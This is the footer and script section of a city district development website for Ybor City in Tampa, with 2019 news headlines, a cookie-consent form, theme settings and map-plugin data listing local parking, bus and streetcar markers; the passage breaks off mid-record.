class=columns_wrap><aside id=citygov_widget_socials-2 class="widget_number_1 column-1_3 widget widget_socials"><div class=widget_inner><div class=logo_descr><center style=margin-top:-40px;><br> <a href=https://yborcityonline.com/><img src=https://cdn.yborcityonline.com/wp-content/uploads/2016/10/YCDC-Logo-small.png align=center itemprop=image></img></a><br> <b itemprop=name>Ybor City Development<br> Corporation, Inc.</b><br> <br> City of Tampa<br> <span itemprop=streetAddress><a href="https://www.google.com/maps/place/2015+E+7th+Ave,+Tampa,+FL+33605/data=!4m2!3m1!1s0x88c2c4523525e6db:0x1f61a780bfd71120?sa=X&ved=0ahUKEwirpu2a5oDRAhUB1mMKHZvgBUEQ8gEIGTAA">2015 East 7th Avenue</span><br> <span itemprop=addressLocality>Tampa,</span><span itemprop=addressRegion> FL</span> <span itemprop=postalCode> 33605</span></a><br> <br> <a href=tel:1-813-274-7936 itemprop=telephone>(813) 274-7936</a><br></center></div><div class="sc_socials sc_socials_type_icons sc_socials_shape_ sc_socials_size_tiny"><div class=sc_socials_item><a href=https://twitter.com/historicybor target=_blank class="social_icons social_twitter"><span class=icon-twitter></span></a></div><div class=sc_socials_item><a href=https://www.instagram.com/moreinybor/ target=_blank class="social_icons social_instagramm"><span class=icon-instagramm></span></a></div><div class=sc_socials_item><a href=https://www.linkedin.com/company/ybor-city-development-city/ target=_blank class="social_icons social_linkedin"><span class=icon-linkedin></span></a></div><div class=sc_socials_item><a href=https://www.facebook.com/YborCityTampa target=_blank class="social_icons social_facebook"><span class=icon-facebook></span></a></div><div class=sc_socials_item><a href=https://www.youtube.com/user/yborcitydev target=_blank class="social_icons social_youtube"><span class=icon-youtube></span></a></div></div></div></aside><aside id=citygov_widget_recent_posts-3 class="widget_number_2 column-1_3 widget widget_recent_posts"><h5 class="widget_title">Recent News</h5><article class="post_item no_thumb first"><div class=widget_area_top><div class=post_content><h5 class="post_title"><a href=https://yborcityonline.com/j-c-newman-breaks-ground-on-multimillion-dollar-factory-expansion/>J.C. Newman Breaks Ground on Multimillion Dollar Factory Expansion</a></h5></div></div><div class=widget_area_bottom><div class=post_info><span class="post_info_item post_info_posted"><a href=https://yborcityonline.com/j-c-newman-breaks-ground-on-multimillion-dollar-factory-expansion/ class=post_info_date>May 8, 2019</a></span><span class="post_info_item post_info_counters"><a href=https://yborcityonline.com/j-c-newman-breaks-ground-on-multimillion-dollar-factory-expansion/ class="post_counters_item post_counters_comments icon-comment-1"><span class=post_counters_number>0</span></a></span></div></div></article><article class="post_item no_thumb"><div class=widget_area_top><div class=post_content><h5 class="post_title"><a href=https://yborcityonline.com/mexican-cocktail-inspires-ybor-city-craft-beer-in-old-tampa/>Mexican Cocktail Inspires Ybor City Craft Beer in Old Tampa</a></h5></div></div><div class=widget_area_bottom><div class=post_info><span class="post_info_item post_info_posted"><a href=https://yborcityonline.com/mexican-cocktail-inspires-ybor-city-craft-beer-in-old-tampa/ class=post_info_date>May 2, 2019</a></span><span class="post_info_item post_info_counters"><a href=https://yborcityonline.com/mexican-cocktail-inspires-ybor-city-craft-beer-in-old-tampa/ class="post_counters_item post_counters_comments icon-comment-1"><span class=post_counters_number>0</span></a></span></div></div></article><article class="post_item no_thumb"><div class=widget_area_top><div class=post_content><h5 class="post_title"><a href=https://yborcityonline.com/ybor-city-2019-spring-photo-contest-launched/>Ybor City 2019 Spring Photo Contest Launched</a></h5></div></div><div class=widget_area_bottom><div class=post_info><span class="post_info_item post_info_posted"><a href=https://yborcityonline.com/ybor-city-2019-spring-photo-contest-launched/ class=post_info_date>March 29, 2019</a></span><span class="post_info_item post_info_counters"><a href=https://yborcityonline.com/ybor-city-2019-spring-photo-contest-launched/ class="post_counters_item post_counters_comments icon-comment-1"><span class=post_counters_number>0</span></a></span></div></div></article><article class="post_item no_thumb"><div class=widget_area_top><div class=post_content><h5 class="post_title"><a href=https://yborcityonline.com/tampa-baseball-museum-to-celebrate-local-history-of-the-game-with-free-homeruns-history-event-in-ybor-city-march-23/>Tampa Baseball Museum to Celebrate Local History of the Game with Free ‘Homeruns & History’ Event in Ybor City March 23</a></h5></div></div><div class=widget_area_bottom><div class=post_info><span class="post_info_item post_info_posted"><a href=https://yborcityonline.com/tampa-baseball-museum-to-celebrate-local-history-of-the-game-with-free-homeruns-history-event-in-ybor-city-march-23/ class=post_info_date>March 22, 2019</a></span><span class="post_info_item post_info_counters"><a href=https://yborcityonline.com/tampa-baseball-museum-to-celebrate-local-history-of-the-game-with-free-homeruns-history-event-in-ybor-city-march-23/ class="post_counters_item post_counters_comments icon-comment-1"><span class=post_counters_number>0</span></a></span></div></div></article></aside><aside id=text-7 class="widget_number_3 column-1_3 widget widget_text"><h5 class="widget_title">Links</h5><div class=textwidget><a href=https://yborcityonline.com/about/ class=bot_link>About YCDC</a> <a href=https://yborcityonline.com/about/merchant-directory/ class=bot_link>Merchant Directory</a> <a href=https://yborcityonline.com/available-properties/ class=bot_link>Available Properties</a> <a href=https://yborcityonline.com/events/month/ class=bot_link>Calendar of Events</a> <a href=https://yborcityonline.com/get-around/ class=bot_link>Map of Ybor</a> <a href=https://yborcityonline.com/photo-gallery/ class=bot_link>Photo Gallery</a> <a href="https://tampagov.us12.list-manage.com/subscribe/post?u=d728cc5501f9792fdda4e8e62&id=542627b95d" class=bot_link>Sign-Up For the Newsletter</a> <a href=https://yborcityonline.com/about/yes-team/ class=bot_link>District Clean-Up</a></div></aside></div></div></div></footer><div class="copyright_wrap copyright_style_text scheme_original"><div class=copyright_wrap_inner><div class=content_wrap><div class=copyright_text><p>Copyright All Rights Reserved © 2019 | Site designed and maintained by <a href=http://www.hcpassociates.com target=_blank>HCP Associates</a>| <a href=https://yborcityonline.com/privacy-policy>Privacy Policy</a></p></div></div></div></div></div></div><a href=# class="scroll_to_top icon-up" title="Scroll to top"></a><div class=custom_html_section></div><div class="gdpr gdpr-overlay"></div><div class="gdpr gdpr-privacy-bar" style=display:none;><div class=gdpr-wrapper><div class=gdpr-content><p>We respect your privacy and as a result, we have created this informational disclosure.</p></div><div class=gdpr-right><div class=gdpr-buttons> <button class=gdpr-preferences type=button>Privacy Preferences</button> <button class=gdpr-agreement type=button>I Agree</button></div> <span class=gdpr-close></span></div></div></div><div class="gdpr gdpr-privacy-preferences"><div class=gdpr-wrapper><form method=post class=gdpr-privacy-preferences-frm> <input type=hidden name=action value=gdpr_update_privacy_preferences> <input type=hidden id=update-privacy-preferences-nonce name=update-privacy-preferences-nonce value=8a17116380><input type=hidden name=_wp_http_referer value=/><header><div class=gdpr-box-title><h3>Privacy Preference Center</h3> <span class=gdpr-close></span></div></header><div class=gdpr-mobile-menu> <button type=button>Options</button></div><div class=gdpr-content><div class=gdpr-tabs><ul class><li><button type=button class="gdpr-tab-button gdpr-active" data-target=gdpr-consent-management>Consent Management</button></li><li><button type=button class="gdpr-tab-button gdpr-cookie-settings" data-target=cookies-used>Cookie Settings</button><ul class=gdpr-subtabs><li><button type=button data-target=cookies-used >Cookies Used</button></li></ul></li></ul><ul class=gdpr-policies></ul></div><div class=gdpr-tab-content><div class="gdpr-consent-management gdpr-active"><header><h4>Consent Management</h4></header><div class=gdpr-info><p>We respect your privacy and as a result, we have created this informational disclosure.</p><div class=gdpr-cookies-used><div class=gdpr-cookie-title><p>Privacy Policy</p> <label class=gdpr-switch> <input type=checkbox name=user_consents[] value=privacy-policy checked> <span class="gdpr-slider round"></span> <span class=gdpr-switch-indicator-on>ON</span> <span class=gdpr-switch-indicator-off>OFF</span> </label></div><div class=gdpr-cookies> <span>You read and agreed to our <a href=https://yborcityonline.com/privacy-policy target=_blank>Privacy Policy</a>.</span></div></div></div></div><div class=cookies-used><header><h4>Cookies Used</h4></header><div class=gdpr-info><p>Google Analytics and AdWords</p><div class=gdpr-cookies-used><div class=gdpr-cookie-title><p>Cookies Used</p> <label class=gdpr-switch> <input type=checkbox class=gdpr-cookie-category data-category=cookies-used name=approved_cookies[] value=[&quot;_ga&quot;,&quot;_gid&quot;,&quot;&quot;] checked=checked> <span class="gdpr-slider round"></span> <span class=gdpr-switch-indicator-on>ON</span> <span class=gdpr-switch-indicator-off>OFF</span> </label></div><div class=gdpr-cookies> <span>_ga, _gid,</span></div></div><div class=gdpr-cookies-used><div class=gdpr-cookie-title><p>google.com</p> <a href=https://tools.google.com/dlpage/gaoptout target=_blank class=gdpr-button>Opt Out</a></div><div class=gdpr-cookies> <span>_ga, _gid,</span></div></div></div></div></div> <input type=hidden name=all_cookies value=[&quot;_ga&quot;,&quot;_gid&quot;,&quot;&quot;]></div><footer> <input type=submit value="Save Preferences"></footer></form></div></div><div class="gdpr gdpr-general-confirmation"><div class=gdpr-wrapper><header><div class=gdpr-box-title><h3></h3> <span class=gdpr-close></span></div></header><div class=gdpr-content><p></p></div><footer> <button class=gdpr-ok>OK</button></footer></div></div> <script>(function(body){'use strict';body.className=body.className.replace(/\btribe-no-js\b/,'tribe-js');})(document.body);</script> <script>if(typeof CITYGOV_STORAGE=='undefined')var CITYGOV_STORAGE={};if(CITYGOV_STORAGE['theme_font']=='')CITYGOV_STORAGE['theme_font']='Open Sans';CITYGOV_STORAGE['theme_skin_color']='#1f252b';CITYGOV_STORAGE['theme_skin_bg_color']='#f3f3f3';</script><script>if(typeof CITYGOV_STORAGE=='undefined')var CITYGOV_STORAGE={};CITYGOV_STORAGE["strings"]={ajax_error:"Invalid server answer",bookmark_add:"Add the bookmark",bookmark_added:"Current page has been successfully added to the bookmarks. You can see it in the right panel on the tab &#039;Bookmarks&#039;",bookmark_del:"Delete this bookmark",bookmark_title:"Enter bookmark title",bookmark_exists:"Current page already exists in the bookmarks list",search_error:"Error occurs in AJAX search! Please, type your query and press search icon for the traditional search way.",email_confirm:"On the e-mail address &quot;%s&quot; we sent a confirmation email. Please, open it and click on the link.",reviews_vote:"Thanks for your vote! New average rating is:",reviews_error:"Error saving your vote! Please, try again later.",error_like:"Error saving your like! Please, try again later.",error_global:"Global error text",name_empty:"The name can&#039;t be empty",name_long:"Too long name",email_empty:"Too short (or empty) email address",email_long:"Too long email address",email_not_valid:"Invalid email address",subject_empty:"The subject can&#039;t be empty",subject_long:"Too long subject",text_empty:"The message text can&#039;t be empty",text_long:"Too long message text",send_complete:"Send message complete!",send_error:"Transmit failed!",login_empty:"The Login field can&#039;t be empty",login_long:"Too long login field",login_success:"Login success! The page will be reloaded in 3 sec.",login_failed:"Login failed!",password_empty:"The password can&#039;t be empty and shorter then 4 characters",password_long:"Too long password",password_not_equal:"The passwords in both fields are not equal",registration_success:"Registration success! Please log in!",registration_failed:"Registration failed!",geocode_error:"Geocode was not successful for the following reason:",googlemap_not_avail:"Google map API not available!",editor_save_success:"Post content saved!",editor_save_error:"Error saving post data!",editor_delete_post:"You really want to delete the current post?",editor_delete_post_header:"Delete post",editor_delete_success:"Post deleted!",editor_delete_error:"Error deleting post!",editor_caption_cancel:"Cancel",editor_caption_close:"Close"};</script><script>if(typeof CITYGOV_STORAGE=='undefined')var CITYGOV_STORAGE={};CITYGOV_STORAGE['ajax_url']='https://yborcityonline.com/wp-admin/admin-ajax.php';CITYGOV_STORAGE['ajax_nonce']='630f0cfbae';CITYGOV_STORAGE['site_url']='https://yborcityonline.com';CITYGOV_STORAGE['vc_edit_mode']=false;CITYGOV_STORAGE['theme_font']='Open Sans';CITYGOV_STORAGE['theme_skin']='citygov';CITYGOV_STORAGE['theme_skin_color']='#1f252b';CITYGOV_STORAGE['theme_skin_bg_color']='#f3f3f3';CITYGOV_STORAGE['slider_height']=100;CITYGOV_STORAGE['system_message']={message:'',status:'',header:''};CITYGOV_STORAGE['user_logged_in']=false;CITYGOV_STORAGE['toc_menu']='';CITYGOV_STORAGE['toc_menu_home']=true;CITYGOV_STORAGE['toc_menu_top']=true;CITYGOV_STORAGE['menu_fixed']=false;CITYGOV_STORAGE['menu_relayout']=960;CITYGOV_STORAGE['menu_responsive']=767;CITYGOV_STORAGE['menu_slider']=true;CITYGOV_STORAGE['menu_cache']=false;CITYGOV_STORAGE['demo_time']=0;CITYGOV_STORAGE['media_elements_enabled']=false;CITYGOV_STORAGE['ajax_search_enabled']=true;CITYGOV_STORAGE['ajax_search_min_length']=3;CITYGOV_STORAGE['ajax_search_delay']=200;CITYGOV_STORAGE['css_animation']=true;CITYGOV_STORAGE['menu_animation_in']='none';CITYGOV_STORAGE['menu_animation_out']='none';CITYGOV_STORAGE['popup_engine']='magnific';CITYGOV_STORAGE['email_mask']='^([a-zA-Z0-9_\-]+\.)*[a-zA-Z0-9_\-]+@[a-z0-9_\-]+(\.[a-z0-9_\-]+)*\.[a-z]{2,6}$';CITYGOV_STORAGE['contacts_maxlength']=1000;CITYGOV_STORAGE['comments_maxlength']=1000;CITYGOV_STORAGE['remember_visitors_settings']=false;CITYGOV_STORAGE['admin_mode']=false;CITYGOV_STORAGE['isotope_resize_delta']=0.3;CITYGOV_STORAGE['error_message_box']=null;CITYGOV_STORAGE['viewmore_busy']=false;CITYGOV_STORAGE['video_resize_inited']=false;CITYGOV_STORAGE['top_panel_height']=0;</script><script>var tribe_l10n_datatables={"aria":{"sort_ascending":": activate to sort column ascending","sort_descending":": activate to sort column descending"},"length_menu":"Show _MENU_ entries","empty_table":"No data available in table","info":"Showing _START_ to _END_ of _TOTAL_ entries","info_empty":"Showing 0 to 0 of 0 entries","info_filtered":"(filtered from _MAX_ total entries)","zero_records":"No matching records found","search":"Search:","all_selected_text":"All items on this page were selected. ","select_all_link":"Select all pages","clear_selection":"Clear Selection.","pagination":{"all":"All","next":"Next","previous":"Previous"},"select":{"rows":{"0":"","_":": Selected %d rows","1":": Selected 1 row"}},"datepicker":{"dayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"dayNamesShort":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"dayNamesMin":["S","M","T","W","T","F","S"],"monthNames":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesShort":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesMin":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"nextText":"Next","prevText":"Prev","currentText":"Today","closeText":"Done","today":"Today","clear":"Clear"}};var tribe_system_info={"sysinfo_optin_nonce":"c09945b292","clipboard_btn_text":"Copy to clipboard","clipboard_copied_text":"System info copied","clipboard_fail_text":"Press \"Cmd + C\" to copy"};</script> <script>function revslider_showDoubleJqueryError(sliderID){var errorMessage="Revolution Slider Error: You have some jquery.js library include that comes after the revolution files js include.";errorMessage+="<br> This includes make eliminates the revolution slider libraries, and make it not work.";errorMessage+="<br><br> To fix it you can:<br>&nbsp;&nbsp;&nbsp; 1. In the Slider Settings -> Troubleshooting set option: <strong><b>Put JS Includes To Body</b></strong> option to true.";errorMessage+="<br>&nbsp;&nbsp;&nbsp; 2. Find the double jquery.js include and remove it.";errorMessage="<span style=font-size:16px;color:#BC0C06;>"+errorMessage+"</span>";jQuery(sliderID).show().html(errorMessage);}</script> <link rel=stylesheet href=https://cdn.yborcityonline.com/wp-content/cache/minify/cf47c.css media=all><link rel=stylesheet id=vc_google_fonts_cinzelregular700900-css href='//fonts.googleapis.com/css?family=Cinzel%3Aregular%2C700%2C900&#038;ver=5.0.4' type=text/css media=all><link rel=stylesheet href=https://cdn.yborcityonline.com/wp-content/cache/minify/39d35.css media=all><style id=wpgmaps-style-pro-inline-css>.wpgmza_map img{max-width:none}.wpgmza_widget{overflow:auto}</style><link rel=stylesheet href=https://cdn.yborcityonline.com/wp-content/cache/minify/d7ee8.css media=all> <script src=https://cdn.yborcityonline.com/wp-content/cache/minify/a0949.js></script> <script>var wpApiSettings={"root":"https:\/\/yborcityonline.com\/wp-json\/","nonce":"45c5b14e2f","versionString":"wp\/v2\/"};</script> <script src=https://cdn.yborcityonline.com/wp-content/cache/minify/09aef.js></script> <script src='//maps.google.com/maps/api/js?v=quarterly&#038;language=en&#038;key=AIzaSyCq_h5YRnQomhjoSnTyyykgII6mdC-46wc&#038;libraries=geometry%2Cplaces%2Cvisualization&#038;ver=5.0.4'></script> <script>/*<![CDATA[*/var WPGMZA_localized_data={"adminurl":"https:\/\/yborcityonline.com\/wp-admin\/","ajaxurl":"https:\/\/yborcityonline.com\/wp-admin\/admin-ajax.php","html":{"googleMapsAPIErrorDialog":"<div>\r\n\r\n\t<h2>Maps API Error<\/h2>\r\n\t\r\n\t<div>\r\n\t\r\n\t\t<p>\r\n\t\t\tOne or more error(s) have occured attempting to initialize the Maps API:\t\t<\/p>\r\n\t\r\n\t\t<ul class=\"wpgmza-google-api-error-list\">\n<li class=\"template notice notice-error\">\r\n\t\t\t\t<span class=\"wpgmza-message\"><\/span>\r\n\t\t\t\t<span class=\"wpgmza-documentation-buttons\">\r\n\t\t\t\t\t<a target=\"_blank\">\r\n\t\t\t\t\t\t<i class=\"fa\" aria-hidden=\"true\"><\/i>\r\n\t\t\t\t\t<\/a>\r\n\t\t\t\t<\/span>\r\n\t\t\t<\/li>\r\n\t\t<\/ul>\n<\/div>\r\n\t\r\n\t<p>\r\n\t\tSee our documentation for solutions to common Google API issues:\t<\/p>\r\n\t\r\n\t<ul>\n<li>\r\n\t\t\t<a href=\"https:\/\/www.wpgmaps.com\/documentation\/you-have-exceeded-your-request-quota-for-this-api\/\">\r\n\t\t\t\t\u201cYou have exceeded your request quota for this API\u201d\t\t\t<\/a>\r\n\t\t<\/li>\r\n\t\t<li>\r\n\t\t\t<a href=\"https:\/\/www.wpgmaps.com\/documentation\/troubleshooting\/this-page-cant-load-google-maps-correctly\/\">\r\n\t\t\t\t\u201cThis page can\u2019t load Google Maps correctly\u201d\t\t\t<\/a>\r\n\t\t<\/li>\r\n\t\t<li>\r\n\t\t\t<a href=\"https:\/\/www.wpgmaps.com\/documentation\/troubleshooting\/this-api-project-is-not-authorized-to-use-this-api\/\">\r\n\t\t\t\t\u201cThis API project is not authorized to use this API\u201d\t\t\t<\/a>\r\n\t\t<\/li>\r\n\t\t<li>\r\n\t\t\t<a href=\"https:\/\/www.wpgmaps.com\/documentation\/troubleshooting\/api-not-activated-map-error\/\">\r\n\t\t\t\t\u201cAPI Not Activated Map Error\u201d\t\t\t<\/a>\r\n\t\t<\/li>\r\n\t<\/ul>\n<p>\r\n\t\tPlease see the <a href=\"https:\/\/www.wpgmaps.com\/documentation\/creating-a-google-maps-api-key\/\">WP Google Maps Documentation<\/a> for a step by step guide on setting up your Google Maps API key.\t<\/p>\r\n\t\r\n\t<p>\r\n\t\tPlease open your Developer Tools (F12 for most browsers) and see your JavaScript console for the full error message.\t<\/p>\r\n\t\r\n\t<p class=\"wpgmza-front-end-only\">\r\n\t\t<i class=\"fa fa-eye\" aria-hidden=\"true\"><\/i>\r\n\t\tThis dialog is only visible to administrators\t<\/p>\r\n\t\r\n\t<!--<button data-remodal-action=\"confirm\" class=\"remodal-confirm\">\r\n\t\tDismiss\t<\/button>-->\r\n\r\n<\/div>"},"resturl":"https:\/\/yborcityonline.com\/wp-json\/wpgmza\/v1","restnonce":"45c5b14e2f","settings":{"wpgmza_settings_image_resizing":"yes","wpgmza_settings_image_width":"","wpgmza_settings_image_height":"","wpgmza_settings_infowindow_width":"","wpgmza_settings_infowindow_link_text":"More details","wpgmza_settings_map_scroll":"yes","wpgmza_settings_map_striptags":"0","wpgmza_settings_ugm_autoapprove":"0","wpgmza_settings_ugm_email_new_marker":"0","wpgmza_custom_css":"","wpgmza_settings_carousel_markerlist_address":"yes","wpgmza_settings_carousel_markerlist_description":"yes","wpgmza_settings_carousel_markerlist_marker_link":"yes","wpgmza_settings_carousel_markerlist_directions":"yes","wpgmza_settings_carousel_markerlist_resize_image":"yes","wpgmza_settings_carousel_markerlist_theme":"sky","wpgmza_default_items":"10","carousel_items":"5","carousel_autoplay":"5000","carousel_lazyload":"yes","carousel_autoheight":"yes","carousel_navigation":"yes","wpgmza_settings_filterbycat_type":"1","wpgmza_settings_map_open_marker_by":"1","wpgmza_api_version":"3.31","wpgmza_settings_access_level":"manage_options","wpgmza_settings_retina_width":"31","wpgmza_settings_retina_height":"45","wpgmza_settings_marker_pull":"0","wpgmza_iw_type":"-1","wpgmza_settings_carousel_markerlist_image":"","wpgmza_settings_carousel_markerlist_icon":"","wpgmza_settings_carousel_markerlist_title":"","wpgmza_settings_carousel_markerlist_link":"","wpgmza_settings_use_timthumb":"yes","carousel_pagination":"","wpgmza_gdpr_enabled":1,"wpgmza_gdpr_notice":"I agree for my personal data to be processed by {COMPANY_NAME}.\r\n\t\t\r\nI agree for my personal data, provided via map API calls, to be processed by the API provider, for the purposes of geocoding (converting addresses to coordinates), reverse geocoding and generating directions.\r\n\r\nSome visual components of WP Google Maps use 3rd party libraries which are loaded over the network. At present the libraries are Google Maps, Open Street Map, jQuery DataTables and FontAwesome. When loading resources over a network, the 3rd party server will receive your IP address and User Agent string amongst other details. Please refer to the Privacy Policy of the respective libraries for details on how they use data and the process to exercise your rights under the GDPR regulations.\r\n\r\nWP Google Maps uses jQuery DataTables to display sortable, searchable tables, such as that seen in the Advanced Marker Listing and on the Map Edit Page. jQuery DataTables in certain circumstances uses a cookie to save and later recall the \"state\" of a given table - that is, the search term, sort column and order and current page. This data is help in local storage and retained until this is cleared manually. No libraries used by WP Google Maps transmit this information.\r\n\r\nPlease <a href=\"https:\/\/developers.google.com\/maps\/terms\">see here<\/a> and <a href=\"https:\/\/maps.google.com\/help\/terms_maps.html\">here<\/a> for Google's terms. Please also see <a href=\"https:\/\/policies.google.com\/privacy?hl=en-GB&gl=uk\">Google's Privacy Policy<\/a>. We do not send the API provider any personally identifying information, or information that could uniquely identify your device.\r\n\r\nWhere this notice is displayed in place of a map, agreeing to this notice will store a cookie recording your agreement so you are not prompted again.","wpgmza_gdpr_retention_purpose":"presenting the data you have submitted on the map.","wpgmza_google_maps_api_key":"AIzaSyCq_h5YRnQomhjoSnTyyykgII6mdC-46wc"},"currentPage":null,"userCanAdministrator":"0","localized_strings":{"unsecure_geolocation":"Many browsers are no longer allowing geolocation from unsecured origins. You will need to secure your site with an SSL certificate (HTTPS) or this feature may not work for your visitors","use_my_location":"Use my location","google_api_not_loaded":"The map cannot be initialized because the Maps API has not been loaded. Please check your settings.","no_google_maps_api_key":"You have not entered a Google Maps API Key. Please see our documentation on obtaining an API key.","documentation":"Documentation","api_dashboard":"API Dashboard","verify_project":"Verify Project","failed_to_get_address":"Failed to get address","failed_to_create_marker":"Failed to create marker %d - this marker cannot be placed on the map.","my_location":"My Location","kilometers_away":"km away","miles_away":"miles away","import_completed":"Import completed.","importing_please_wait":"Importing, this may take a moment...","no_address_specified":"No address specified","add_marker":"Add Marker","save_marker":"Save Marker","please_wait":"Please Wait...","zero_results":"Zero results found","geocode_fail":"Geocode failed due to technical reasons"},"api_consent_html":"<div class=\"wpgmza-gdpr-compliance\"><p>\r\n\tI agree for my personal data to be processed by <span name=\"wpgmza_gdpr_company_name\">Ybor City<\/span>, for the purpose(s) of <span name=\"wpgmza_gdpr_retention_purpose\">presenting the data you have submitted on the map.<\/span>.\r\n<\/p>\r\n\r\n<p>\t\r\n\tI agree for my personal data, provided via map API calls, to be processed by the API provider, for the purposes of geocoding (converting addresses to coordinates), reverse geocoding and\tgenerating directions.\r\n<\/p>\r\n<p>\r\n\tSome visual components of WP Google Maps use 3rd party libraries which are loaded over the network. At present the libraries are Google Maps, Open Street Map, jQuery DataTables and FontAwesome. When loading resources over a network, the 3rd party server will receive your IP address and User Agent string amongst other details. Please refer to the Privacy Policy of the respective libraries for details on how they use data and the process to exercise your rights under the GDPR regulations.\r\n<\/p>\r\n<p>\r\n\tWP Google Maps uses jQuery DataTables to display sortable, searchable tables, such as that seen in the Advanced Marker Listing and on the Map Edit Page. jQuery DataTables in certain circumstances uses a cookie to save and later recall the \"state\" of a given table - that is, the search term, sort column and order and current page. This data is held in local storage and retained until this is cleared manually. No libraries used by WP Google Maps transmit this information.\r\n<\/p>\r\n<p>\r\n\tPlease <a href=\"https:\/\/developers.google.com\/maps\/terms\">see here<\/a> and <a href=\"https:\/\/maps.google.com\/help\/terms_maps.html\">here<\/a> for Google's terms. Please also see <a href=\"https:\/\/policies.google.com\/privacy?hl=en-GB&gl=uk\">Google's Privacy Policy<\/a>. We do not send the API provider any personally identifying information, or information that could uniquely identify your device.\r\n<\/p>\r\n<p>\r\n\tWhere this notice is displayed in place of a map, agreeing to this notice will store a cookie recording your agreement so you are not prompted again.\r\n<\/p><p class=wpgmza-centered><button class=wpgmza-api-consent>I agree<\/button><\/div><\/p>","basic_version":"7.11.21","_isProVersion":"","defaultMarkerIcon":"\/\/maps.gstatic.com\/mapfiles\/api-3\/images\/spotlight-poi2.png","is_admin":"0","locale":"en_US","pro_version":"6.38","gutenbergData":{"maps":[{"id":"1","map_title":"My first map"},{"id":"2","map_title":"New Map"}]}};/*]]>*/</script> <script src=https://cdn.yborcityonline.com/wp-content/cache/minify/1b389.js></script> <script>/*<![CDATA[*/var wpgmaps_localize={"1":{"id":"1","map_title":"My first map","map_width":"100","map_height":"500","map_start_lat":"27.961495","map_start_lng":"-82.440949","map_start_location":"27.961495279820923,-82.44094938099681","map_start_zoom":"16","default_marker":"0","type":"1","alignment":"2","directions_enabled":"2","styling_enabled":"0","styling_json":"","active":"0","kml":"","bicycle":"2","traffic":"2","dbox":"1","dbox_width":"100","listmarkers":"0","listmarkers_advanced":"0","filterbycat":"0","ugm_enabled":"0","ugm_category_enabled":"0","fusion":"","map_width_type":"%","map_height_type":"px","mass_marker_support":"1","ugm_access":"0","order_markers_by":"1","order_markers_choice":"2","show_user_location":"2","default_to":"","other_settings":{"wpgmza_store_locator_restrict":"","wpgmza_sl_animation":"1","store_locator_bounce":1,"store_locator_query_string":"ZIP \/ Address:","store_locator_name_string":"Title \/ Description:","store_locator_default_address":"","wpgmza_dbox_width_type":"%","map_max_zoom":"1","map_min_zoom":"21","sl_stroke_color":"FF0000","sl_stroke_opacity":"0.25","sl_fill_color":"FF0000","sl_fill_opacity":"0.15","click_open_link":2,"transport_layer":2,"iw_primary_color":"2A3744","iw_accent_color":"252F3A","iw_text_color":"FFFFFF","wpgmza_iw_type":"0","list_markers_by":"0","push_in_map":"","push_in_map_placement":"9","wpgmza_push_in_map_width":"","wpgmza_push_in_map_height":"","wpgmza_theme_data":"","upload_default_ul_marker":"","upload_default_sl_marker":""},"total_markers":50}};var wpgmaps_localize_mashup_ids=null;var wpgmaps_localize_marker_data={"1":{"6":{"map_id":"1","marker_id":"6","title":"Fernando Noriega Jr. Garage","address":"27.961340813197577, -82.44613213464618","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-Parking-Garage.png","linkd":"https:\/\/www.google.com\/maps\/place\/Palm+Garage\/@27.9614112,-82.4460358,20.25z\/data=!4m13!1m7!3m6!1s0x88c2c45b1b160da7:0x7c7980d13ab92d7a!2s2010+N+13th+St,+Tampa,+FL+33605!3b1!8m2!3d27.961696!4d-82.4460693!3m4!1s0x0:0x5ca898418d3b2750!8m2!3d27.9616299!4d-82.446072","lat":"27.961341","lng":"-82.446132","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"8":{"map_id":"1","marker_id":"8","title":"Bus Stop","address":"27.960374216441448, -82.44023127481341","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-HART-Bus.png","linkd":"","lat":"27.9603742164","lng":"-82.4402312748","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"9":{"map_id":"1","marker_id":"9","title":"Bus Stop","address":"27.96040264588135, -82.44263453409076","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-HART-Bus.png","linkd":"","lat":"27.9604026459","lng":"-82.4426345341","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"10":{"map_id":"1","marker_id":"10","title":"Tampa Bay Federal Credit Union Station","address":"27.960996182764376, -82.44124255143106","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-Streetcar.png","linkd":"https:\/\/www.google.com\/maps\/place\/Tampa+Bay+Fed+Cr+Union+Station+(2)\/@27.9609692,-82.4411277,20.75z\/data=!4m13!1m7!3m6!1s0x0:0x0!2zMjfCsDU3JzM5LjYiTiA4MsKwMjYnMjguNSJX!3b1!8m2!3d27.9609962!4d-82.4412426!3m4!1s0x88c2c45066814ad7:0x42fae10ceca8b173!8m2!3d27.9610632!4d-82.4412339","lat":"27.960996","lng":"-82.441243","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"11":{"map_id":"1","marker_id":"11","title":"Streetcar Society Station","address":"27.961015135615934, -82.44327566586435","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-Streetcar.png","linkd":"https:\/\/www.google.com\/maps\/place\/Streetcar+Society+Station+(3)\/@27.9610185,-82.4433928,21z\/data=!4m13!1m7!3m6!1s0x0:0x0!2zMjfCsDU3JzM5LjYiTiA4MsKwMjYnMzUuOCJX!3b1!8m2!3d27.9610151!4d-82.4432757!3m4!1s0x88c2c45a84735fc3:0x62706c032cef2025!8m2!3d27.9610632!4d-82.443269","lat":"27.961015","lng":"-82.443276","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"12":{"map_id":"1","marker_id":"12","title":"Bus Stop","address":"27.958099836988133, 